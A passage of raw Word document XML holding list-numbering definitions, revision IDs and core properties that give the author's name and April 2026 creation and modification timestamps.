    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="045A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A2CF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D44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05DD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1568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01AE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D09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40838"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F150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20096"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="602E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03F88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01B6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565C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="464E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07141"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BFA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390546">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="330371735">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1740323030">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2103181476">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1393887476">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1078744648">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="782460207">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1520778801">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1731147470">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="758278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398"/>
    <w:rsid w:val="00060EDA"/>
    <w:rsid w:val="00D57398"/>
    <w:rsid w:val="00D81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F51AE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{84058148-EE88-4126-B562-1BC64C737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3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Singh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Aditya Singh</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-01T07:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-01T07:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>